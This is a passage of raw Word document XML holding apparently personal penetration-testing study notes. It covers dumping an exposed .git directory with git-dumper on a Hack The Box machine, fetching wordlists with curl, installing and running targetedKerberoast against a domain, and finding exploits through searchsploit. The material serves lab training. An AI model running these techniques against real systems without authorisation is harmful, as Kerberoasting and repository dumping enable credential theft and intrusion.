          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pilgrimage HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, if we find a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/.git/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">directory in the web server, even if we are not able to access the website (403 Forbidden Error), we can dump its contents and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">recreate the repository using a tool such as git-dumper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git-dumper </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://pilgrimage.htb/ ./destination_directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No need to tell git-dumper the exact path to the /.git directory. But, here for example, the /.git directory is only one directory nested, so try and do that so that the git-dumper has an easy time finding it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="841"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./destination_directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032B8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003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2BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kp5xdswd7c83" w:id="448"/>
      <w:bookmarkEnd w:id="448"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want something like: https://github.com/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP/AppSec-Browser-Bundle/blob/master/utilities/ZAP/dirbuster/directory-list-2.3-big.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You do:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="997"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o [FILENAME] [raw_github_URL]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="997"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To find raw_github_URL, click on the Raw button on the top right</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="997"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="406400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="369" name="image362.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image362.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1118"/>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32C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="997"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will start with </w:t>
      </w:r>
      <w:hyperlink r:id="rId1119">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://raw.githubusercontent.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the command asks you for target URL, make sure to add the http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it only asks for IP, then don't include the http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting a whole repo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a whole gitrepo, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="994"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone [URL].git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032CF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ueyrkopg6a2x" w:id="449"/>
      <w:bookmarkEnd w:id="449"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download software with requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://github.com/ShutdownRepo/targetedKerberoast.git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's python, install python and pip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install python3 python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate to the directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd targetedKerberoast</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 targetedKerberoast.py -v -d "your_domain" -u "your_username" -p "your_password"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032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2DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7pattia3hxx" w:id="450"/>
      <w:bookmarkEnd w:id="450"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember exploitdb is the same as searchsploit so if you ever want to download something from exploitdb, just look it up on searchsploit since searchsploit is easier to download from. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AND ALSO, one time, in OSCP-A .145, the exploit didn't work when I downloaded from exploitDB but it worked when I downloaded it from searchsploit. It must be some formatting issues when you try curling it or downloading it from exploitdb.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Especially useful when you don't know the format of the file, so you don't know what to save the exploit as. The file will have the extension on searchsploit!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000032E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1270000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
